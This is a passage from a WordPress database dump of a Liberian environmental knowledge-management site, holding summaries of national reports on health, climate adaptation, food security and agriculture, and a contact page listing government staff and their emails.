Statistics House, Capitol Hill, P.O. Box 629, Monrovia, Liberia; telephone: +231 886 560 435/+231 770 129 883; internet: www.lisgis.net. Information about The DHS Program may be obtained from ICF, 530 Gaither Road, Suite 500, Rockville, MD 20850, USA; telephone: +1-301-407-6500; fax: +1-301-407-6501; email: info@DHSprogram.com; internet: www.DHSprogram.com.Suggested citation:Liberia Institute of Statistics and Geo-Information Services (LISGIS), Ministry of Health [Liberia], and ICF. 2021. Liberia Demographic and Health Survey 2019-20. Monrovia, Liberia and Rockville, Maryland, USA: Liberia Institute of Statistics and Geo-Information Services (LISGIS), Ministry of Health, and ICF','Demographic and  Health Survey 2019-20','','inherit','closed','closed','','5062-revision-v1','','','2022-09-16 11:39:06','2022-09-16 11:39:06','',5062,'https://ekmsliberia.info/?p=5065',0,'revision','',0),(5067,38,'2022-09-16 12:42:54','2022-09-16 12:42:54','This document is to guide students and smallholder farmers how to adapt themselves to climate change when it comes to farming in the Liberian communities. Despite the fact that Liberia is underdeveloped, to be successful\r\nfarmers, there is a need for both the students and smallholder farmers to acquit themselves to the causes/effects of climate change as well as how to find application solution to enable them become a successful farmers to help\r\nthe Government to have access to food security.The Republic of Liberia is located on the west coast of Africa (between longitudes 7 o 30\' and 11 o 30\' west, and latitudes 4 o 8’ and 8 o 30\' north). It is bordered on the west by Sierra Leone, on the north by Guinea, on the east by Côte d’Ivoire, and on the south by the Atlantic Ocean (Figures 1a and b). It is Africa\'s oldest Republic, declared independent in 1874 under a constitution modelled on that of the United States of America. Two civil wars from 1990 to 2003 displaced hundreds of thousands of people and destroyed the economy and infrastructure. A democratic government was elected in 2005.','CLIMATE CHANGE ADAPTATION FOR SMALLHOLDER FARMERS IN LIBERIA','','publish','closed','closed','','climate-change-adaptation-for-smallholder-farmers-in-liberia','','','2022-09-16 12:42:54','2022-09-16 12:42:54','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5067',35,'document','',0),(5068,38,'2022-09-16 12:38:09','2022-09-16 12:38:09','','Climate change','','inherit','open','closed','','climate-change-5','','','2022-09-16 12:38:09','2022-09-16 12:38:09','',5067,'https://ekmsliberia.info/wp-content/uploads/2022/09/Climate-change.png',0,'attachment','image/png',0),(5069,38,'2022-09-16 12:41:47','2022-09-16 12:41:47','','Barrolle-William-2016-Climate-Change-Adaptation-for-Smallholder-Farm-Families','','inherit','open','closed','','barrolle-william-2016-climate-change-adaptation-for-smallholder-farm-families','','','2022-09-16 12:41:47','2022-09-16 12:41:47','',5067,'https://ekmsliberia.info/wp-content/uploads/2022/09/Barrolle-William-2016-Climate-Change-Adaptation-for-Smallholder-Farm-Families.pdf',0,'attachment','application/pdf',0),(5070,38,'2022-09-16 12:42:54','2022-09-16 12:42:54','This document is to guide students and smallholder farmers how to adapt themselves to climate change when it comes to farming in the Liberian communities. Despite the fact that Liberia is underdeveloped, to be successful\r\nfarmers, there is a need for both the students and smallholder farmers to acquit themselves to the causes/effects of climate change as well as how to find application solution to enable them become a successful farmers to help\r\nthe Government to have access to food security.The Republic of Liberia is located on the west coast of Africa (between longitudes 7 o 30\' and 11 o 30\' west, and latitudes 4 o 8’ and 8 o 30\' north). It is bordered on the west by Sierra Leone, on the north by Guinea, on the east by Côte d’Ivoire, and on the south by the Atlantic Ocean (Figures 1a and b). It is Africa\'s oldest Republic, declared independent in 1874 under a constitution modelled on that of the United States of America. Two civil wars from 1990 to 2003 displaced hundreds of thousands of people and destroyed the economy and infrastructure. A democratic government was elected in 2005.','CLIMATE CHANGE ADAPTATION FOR SMALLHOLDER FARMERS IN LIBERIA','','inherit','closed','closed','','5067-revision-v1','','','2022-09-16 12:42:54','2022-09-16 12:42:54','',5067,'https://ekmsliberia.info/?p=5070',0,'revision','',0),(5071,38,'2022-09-16 12:51:01','2022-09-16 12:51:01','Like many other countries globally, Liberia is increasingly experiencing physical changes to its \r\nclimate stemming from anthropogenic global warming 1. These physical changes include warmer temperatures, increases in annual rainfall, and increases in the frequency of heavy rainfall events. Though historically Liberia’s contribution to atmospheric greenhouse gas (GHG) concentrations has been negligible, our country is unfortunately confronted with the daunting challenge of adapting to these new climatic conditions and their impacts.Recognizing the implication of climate change for its national development and in response to its international commitments, the Government of Liberia (GoL), through the Environmental Protection Agency (EPA), has taken various actions to support climate change adaptation planning with several climate-related policies. Liberia has undertaken climate vulnerability assessments and risk on several priority sectors to support these policies, including coastal zones, agriculture, waste management, forestry, and fisheries. Under the EPA\'s guidance and support from the United Nations Development Programme (UNDP), the GoL has prepared this National Adaptation Plan (NAP) framework to guide and advance its National Adaptation Plan process medium- and long-term adaptation needs in a coherent and coordinated \r\nmanner. The purpose of this document is to provide an overall framework to guide the country in developing, \r\ncoordinating, and implementing its NAP process. This document describes the benefits of the NAP process \r\nin the context of Liberia. It ensures that the NAP process does not unnecessarily add to the proliferation of \r\nnational planning processes and related documents. Instead, the NAP process aims to strengthen existing \r\nplanning processes by integrating climate change adaptation considerations. Specifically, the objectives of \r\nthis NAP process are to:','LIBERIA NATIONAL ADAPTATION PLAN 2020 – 2030','','publish','closed','closed','','liberia-national-adaptation-plan-2020-2030','','','2022-09-16 15:07:17','2022-09-16 15:07:17','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5071',34,'document','',0),(5072,38,'2022-09-16 12:48:03','2022-09-16 12:48:03','','NAP','','inherit','open','closed','','nap-2','','','2022-09-16 12:48:03','2022-09-16 12:48:03','',5071,'https://ekmsliberia.info/wp-content/uploads/2022/09/NAP.png',0,'attachment','image/png',0),(5073,38,'2022-09-16 12:49:37','2022-09-16 12:49:37','','LIBERIA_ NAP_ FINAL_ DOCUMENT','','inherit','open','closed','','liberia_-nap_-final_-document','','','2022-09-16 12:49:37','2022-09-16 12:49:37','',5071,'https://ekmsliberia.info/wp-content/uploads/2022/09/LIBERIA_-NAP_-FINAL_-DOCUMENT.pdf',0,'attachment','application/pdf',0),(5074,38,'2022-09-16 12:51:01','2022-09-16 12:51:01','Like many other countries globally, Liberia is increasingly experiencing physical changes to its \r\nclimate stemming from anthropogenic global warming 1. These physical changes include warmer temperatures, increases in annual rainfall, and increases in the frequency of heavy rainfall events. Though historically Liberia’s contribution to atmospheric greenhouse gas (GHG) concentrations has been negligible, our country is unfortunately confronted with the daunting challenge of adapting to these new climatic conditions and their impacts.Recognizing the implication of climate change for its national development and in response to its international commitments, the Government of Liberia (GoL), through the Environmental Protection Agency (EPA), has taken various actions to support climate change adaptation planning with several climate-related policies. Liberia has undertaken climate vulnerability assessments and risk on several priority sectors to support these policies, including coastal zones, agriculture, waste management, forestry, and fisheries. Under the EPA\'s guidance and support from the United Nations Development Programme (UNDP), the GoL has prepared this National Adaptation Plan (NAP) framework to guide and advance its National Adaptation Plan process medium- and long-term adaptation needs in a coherent and coordinated \r\nmanner. The purpose of this document is to provide an overall framework to guide the country in developing, \r\ncoordinating, and implementing its NAP process. This document describes the benefits of the NAP process \r\nin the context of Liberia. It ensures that the NAP process does not unnecessarily add to the proliferation of \r\nnational planning processes and related documents. Instead, the NAP process aims to strengthen existing \r\nplanning processes by integrating climate change adaptation considerations. Specifically, the objectives of \r\nthis NAP process are to:','LIBERIA NATIONAL ADAPTATION PLAN 2020 – 2030','','inherit','closed','closed','','5071-revision-v1','','','2022-09-16 12:51:01','2022-09-16 12:51:01','',5071,'https://ekmsliberia.info/?p=5074',0,'revision','',0),(5075,42,'2022-09-17 09:34:26','2022-09-17 09:34:26','','1413a56e-7f8a-4211-a032-aaa15b304e01','','inherit','open','closed','','1413a56e-7f8a-4211-a032-aaa15b304e01','','','2022-09-17 09:34:26','2022-09-17 09:34:26','',4960,'https://ekmsliberia.info/wp-content/uploads/2022/08/1413a56e-7f8a-4211-a032-aaa15b304e01.jpg',0,'attachment','image/jpeg',0),(5076,38,'2022-09-18 22:16:40','2022-09-18 22:16:40','Liberia is a low income country heavily reliant on internaƟ onal assistance for revenue and human resources because of many years of civil war, which resulted in economic collapse and infrastructural dilapidaƟ on. The country ranks 174 out of 187 in the UNDP 2012 Human Development Index. Gross naƟ onal income per capita is US$480 and the \r\nnaƟ onal poverty headcount raƟ o is 83.9 % (UNDP HDI, 2011). Improved security and the period of recovery \r\nushered in by the 2003 peace agreements have supported economic growth rates averaging 6% a year from 2004 – 2011. This growth was driven by iron ore and rubber exports as well as increased Ɵ mber producƟ on. Infl aƟ on, which fell to 7.5% in 2010 due to lower fuel and food prices, rose sharply to 8.5% in 2013 (IMF, 2013).','LIBERIA COMPREHENSIVE FOOD  SECURITY AND NUTRITION SURVEY ΈCFSNSΉ JUNE 2013','','publish','closed','closed','','liberia-comprehensive-food-security-and-nutrition-survey-%ce%adcfsns%ce%ae-june-2013','','','2022-09-18 22:16:40','2022-09-18 22:16:40','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5076',33,'document','',0),(5077,38,'2022-09-18 22:14:54','2022-09-18 22:14:54','','MOA','','inherit','open','closed','','moa-3','','','2022-09-18 22:14:54','2022-09-18 22:14:54','',5076,'https://ekmsliberia.info/wp-content/uploads/2022/09/MOA.png',0,'attachment','image/png',0),(5078,38,'2022-09-18 22:15:33','2022-09-18 22:15:33','','CFSNS-FINAL','','inherit','open','closed','','cfsns-final','','','2022-09-18 22:15:33','2022-09-18 22:15:33','',5076,'https://ekmsliberia.info/wp-content/uploads/2022/09/CFSNS-FINAL.pdf',0,'attachment','application/pdf',0),(5079,38,'2022-09-18 22:16:40','2022-09-18 22:16:40','Liberia is a low income country heavily reliant on internaƟ onal assistance for revenue and human resources because of many years of civil war, which resulted in economic collapse and infrastructural dilapidaƟ on. The country ranks 174 out of 187 in the UNDP 2012 Human Development Index. Gross naƟ onal income per capita is US$480 and the \r\nnaƟ onal poverty headcount raƟ o is 83.9 % (UNDP HDI, 2011). Improved security and the period of recovery \r\nushered in by the 2003 peace agreements have supported economic growth rates averaging 6% a year from 2004 – 2011. This growth was driven by iron ore and rubber exports as well as increased Ɵ mber producƟ on. Infl aƟ on, which fell to 7.5% in 2010 due to lower fuel and food prices, rose sharply to 8.5% in 2013 (IMF, 2013).','LIBERIA COMPREHENSIVE FOOD  SECURITY AND NUTRITION SURVEY ΈCFSNSΉ JUNE 2013','','inherit','closed','closed','','5076-revision-v1','','','2022-09-18 22:16:40','2022-09-18 22:16:40','',5076,'https://ekmsliberia.info/?p=5079',0,'revision','',0),(5080,38,'2022-09-18 22:28:38','2022-09-18 22:28:38','African governments, in recognition of the relationship between agriculture and economic growth and development of their respective countries, adopted the Comprehensive African Agricultural Development Program (CAADP) in 2003 in \r\nMaputo, Mozambique. CAADP is an integrated, continent-wide framework that seeks to restore agricultural growth, facilitate rural development, and ensure food and nutrition security in Africa. It is based on four main pillars: (i) extending the area under sustainable land management and reliable water control systems; (ii) improving rural \r\ninfrastructures and trade-related capacities for market access; (iii) increasing food supply and reducing hunger; and (iv) strengthening agricultural research, technology dissemination, and adoption.Within the context of fostering agricultural-led economic growth, emphasizing the role of the private sector, CAADP targets agriculture sector growth of 6% per annum and obliges African governments to commit at least 10% of their annual national budgets to agriculture in pursuit of this target. The protocols of the framework call on each African government to develop an agriculture sector investment program that, once approved by the governing authorities, is used as the basis of a “compact” between the government, African partners, and the international donor community. The Government of Liberia (GOL) adheres to the vision and principles of CAADP and is a signatory to the framework. This document, the Liberia Agriculture Sector Investment Program (LASIP), was developed in partial fulfillment of the requirements of the \r\nframework. It presents the strategic choices Liberia has made for agricultural growth and development over the next ten years in an environmentally friendly and sustainable manner. This Executive Summary presents the key features and priorities of the program. Economic and Social Conditions Liberia is a nation-state transitioning from ―emergency to development.‖ Under the leadership of President Ellen Johnson Sirleaf, Africa‘s first female elected head of \r\nstate, the country has embarked on the Herculean task of reconstructing a war-damaged society. The GOL developed a Poverty Reduction Strategy (PRS) that directed efforts toward addressing the interlinking problems of poor governance, illiteracy, unemployment, poverty, and social conflict. The PRS has four pillars: Expanding Peace and Security; Revitalizing Economic Activities; Strengthening Governance and the Rule of Law; and Rebuilding Infrastructure and Providing Basic Services. Liberia‘s population currently stands at 3.5 million. Despite abundant natural resources, bad governance has perennially engendered poverty, conflicts, and low human development. In 2009, Liberia had a human development index of 0.442, ranked 169th out of 182 countries in the world.\r\n','LIBERIA AGRICULTURE SECTOR INVESTMENT PROGRAM (LASIP) REPORT','','publish','closed','closed','','liberia-agriculture-sector-investment-program-lasip-report','','','2022-09-18 22:35:21','2022-09-18 22:35:21','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5080',32,'document','',0),(5081,38,'2022-09-18 22:27:14','2022-09-18 22:27:14','','MOA1','','inherit','open','closed','','moa1','','','2022-09-18 22:27:14','2022-09-18 22:27:14','',5080,'https://ekmsliberia.info/wp-content/uploads/2022/09/MOA1.png',0,'attachment','image/png',0),(5082,38,'2022-09-18 22:27:42','2022-09-18 22:27:42','','LASIPJune1st','','inherit','open','closed','','lasipjune1st','','','2022-09-18 22:27:42','2022-09-18 22:27:42','',5080,'https://ekmsliberia.info/wp-content/uploads/2022/09/LASIPJune1st.pdf',0,'attachment','application/pdf',0),(5083,38,'2022-09-18 22:28:38','2022-09-18 22:28:38','African governments, in recognition of the relationship between agriculture and economic growth and development of their respective countries, adopted the Comprehensive African Agricultural Development Program (CAADP) in 2003 in \r\nMaputo, Mozambique. CAADP is an integrated, continent-wide framework that seeks to restore agricultural growth, facilitate rural development, and ensure food and nutrition security in Africa. It is based on four main pillars: (i) extending the area under sustainable land management and reliable water control systems; (ii) improving rural \r\ninfrastructures and trade-related capacities for market access; (iii) increasing food supply and reducing hunger; and (iv) strengthening agricultural research, technology dissemination, and adoption.Within the context of fostering agricultural-led economic growth, emphasizing the role of the private sector, CAADP targets agriculture sector growth of 6% per annum and obliges African governments to commit at least 10% of their annual national budgets to agriculture in pursuit of this target. The protocols of the framework call on each African government to develop an agriculture sector investment program that, once approved by the governing authorities, is used as the basis of a “compact” between the government, African partners, and the international donor community. The Government of Liberia (GOL) adheres to the vision and principles of CAADP and is a signatory to the framework. This document, the Liberia Agriculture Sector Investment Program (LASIP), was developed in partial fulfillment of the requirements of the \r\nframework. It presents the strategic choices Liberia has made for agricultural growth and development over the next ten years in an environmentally friendly and sustainable manner. This Executive Summary presents the key features and priorities of the program. Economic and Social Conditions Liberia is a nation-state transitioning from ―emergency to development.‖ Under the leadership of President Ellen Johnson Sirleaf, Africa‘s first female elected head of \r\nstate, the country has embarked on the Herculean task of reconstructing a war-damaged society. The GOL developed a Poverty Reduction Strategy (PRS) that directed efforts toward addressing the interlinking problems of poor governance, illiteracy, unemployment, poverty, and social conflict. The PRS has four pillars: Expanding Peace and Security; Revitalizing Economic Activities; Strengthening Governance and the Rule of Law; and Rebuilding Infrastructure and Providing Basic Services. Liberia‘s population currently stands at 3.5 million. Despite abundant natural resources, bad governance has perennially engendered poverty, conflicts, and low human development. In 2009, Liberia had a human development index of 0.442, ranked 169th out of 182 countries in the world.\r\n','LIBERIA AGRICULTURE SECTOR INVESTMENT PROGRAM (LASIP) REPORT','','inherit','closed','closed','','5080-revision-v1','','','2022-09-18 22:28:38','2022-09-18 22:28:38','',5080,'https://ekmsliberia.info/?p=5083',0,'revision','',0),(5086,42,'2022-09-20 10:43:18','2022-09-20 10:43:18','','Halala','','inherit','open','closed','','halala','','','2022-09-20 10:43:18','2022-09-20 10:43:18','',80,'https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg',0,'attachment','image/jpeg',0),(5087,42,'2022-09-20 10:46:35','2022-09-20 10:46:35','','ernest','','inherit','open','closed','','ernest','','','2022-09-20 10:46:35','2022-09-20 10:46:35','',80,'https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg',0,'attachment','image/jpeg',0),(5088,42,'2022-09-20 10:46:44','2022-09-20 10:46:44','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:jduolupeh@gmail.com\">jduolupeh@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, 